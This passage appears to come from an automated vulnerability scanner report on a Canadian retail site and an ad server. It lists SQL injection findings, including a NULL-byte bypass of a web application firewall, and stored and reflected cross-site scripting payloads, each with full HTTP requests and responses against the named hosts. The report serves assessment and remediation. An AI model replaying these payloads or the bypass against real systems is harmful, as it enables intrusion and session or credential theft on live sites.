Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:39 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 50501
Content-Type: text/html
Expires: Fri, 30 Sep 2011 12:30:39 GMT
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&CaptchaOutVal=&msProduct=1782290&msRandX=44%27+and+1%3D2%2D%2D+; path=/
Set-Cookie: Warranty=; expires=Sat, 03-Jan-2009 13:31:38 GMT; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=596c7%250d%250aef0438428a3; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


<html>
<head>
<title>Order Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="TigerDirect.com is your complete o
...[SNIP]...

1.19. https://www.tigerdirect.ca/secure/orderlogin.asp [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.tigerdirect.ca
Path:   /secure/orderlogin.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /secure/orderlogin.asp HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:28 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 43316
Content-Type: text/html
Set-Cookie: DB=msRandX=44%27+and+1%3D2%2D%2D+&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=%5D%5D%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


</form>
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="1;URL=/sectors/nojs/index.asp">
</noscript>
<script Language="Javascript">
function addToCart(h2fsku, sku, qty) {
var
...[SNIP]...
<a href="http://www.tigerdirect.ca/sectors/bugreport/?errorURL=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgisec%2ForderWarranty%2Easp" target="_blank">
...[SNIP]...

Request 2

GET /secure/orderlogin.asp HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:29 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 50483
Content-Type: text/html
Expires: Fri, 30 Sep 2011 12:30:29 GMT
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&CaptchaOutVal=&msProduct=1782290&msRandX=44%27+and+1%3D2%2D%2D+; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: Warranty=; expires=Sat, 03-Jan-2009 13:31:28 GMT; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=%5D%5D%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


<html>
<head>
<title>Order Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="TigerDirect.com is your complete o
...[SNIP]...

1.20. https://www.tigerdirect.ca/secure/orderlogin.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.tigerdirect.ca
Path:   /secure/orderlogin.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /secure/orderlogin.asp?1'=1 HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:15 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 43346
Content-Type: text/html
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&CaptchaOutVal=&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44%27+and+1%3D2%2D%2D+; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=%5D%5D%3E%3E&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


</form>
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="1;URL=/sectors/nojs/index.asp">
</noscript>
<script Language="Javascript">
function addToCart(h2fsku, sku, qty) {
var
...[SNIP]...
<a href="http://www.tigerdirect.ca/sectors/bugreport/?errorURL=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgisec%2ForderWarranty%2Easp" target="_blank">
...[SNIP]...

Request 2

GET /secure/orderlogin.asp?1''=1 HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:16 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 50483
Content-Type: text/html
Expires: Fri, 30 Sep 2011 12:30:16 GMT
Set-Cookie: DB=msRandX=44%27+and+1%3D2%2D%2D+&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&CaptchaOutVal=&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=%5D%5D%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Warranty=; expires=Sat, 03-Jan-2009 13:31:16 GMT; path=/
Cache-control: private


<html>
<head>
<title>Order Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="TigerDirect.com is your complete o
...[SNIP]...

2. Cross-site scripting (stored)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /applications/searchtools/item_upsell.asp

Issue detail

The value of the DB cookie submitted to the URL /cgi-bin/order.asp is copied into an HTML comment at the URL /applications/searchtools/item_upsell.asp. The payload 45303--><img%20src%3da%20onerror%3dalert(1)>ee996b5153 was submitted in the DB cookie. This input was returned as 45303--><img src=a onerror=alert(1)>ee996b5153 in a subsequent request for the URL /applications/searchtools/item_upsell.asp.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

GET /cgi-bin/order.asp?EdpNo=1104495&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128 HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4445303--><img%20src%3da%20onerror%3dalert(1)>ee996b5153; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; SRCCODE=CANW; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&

Request 2

GET /applications/searchtools/item_upsell.asp?EdpNo=1104495&msg= HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&; CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51; SRCCODE=CANW; CartSave=CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51&Cart=2

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:29:09 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANW; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4445303%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eee996b5153; path=/
Set-Cookie: SRVR=WEBX14%2D03A; path=/
Vary: Accept-Encoding
Content-Length: 75544


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--DB(msRandX) :4445303--><img src=a onerror=alert(1)>ee996b5153-->
...[SNIP]...

3. Cross-site scripting (reflected)  previous
There are 488 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cc21"><script>alert(1)</script>5b35710a4ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.03cc21"><script>alert(1)</script>5b35710a4ec/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.03cc21"><script>alert(1)</script>5b35710a4ec/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.2. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e15d7"><script>alert(1)</script>053fcfd23f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1e15d7"><script>alert(1)</script>053fcfd23f1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1e15d7"><script>alert(1)</script>053fcfd23f1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.3. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26556"><script>alert(1)</script>dbb612cc67a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/195968726556"><script>alert(1)</script>dbb612cc67a/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/195968726556"><script>alert(1)</script>dbb612cc67a/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.4. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c638a"><script>alert(1)</script>d0630b63a7e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/1959687/0c638a"><script>alert(1)</script>d0630b63a7e/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0c638a"><script>alert(1)</script>d0630b63a7e/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.5. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2931"><script>alert(1)</script>55800ca2451 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

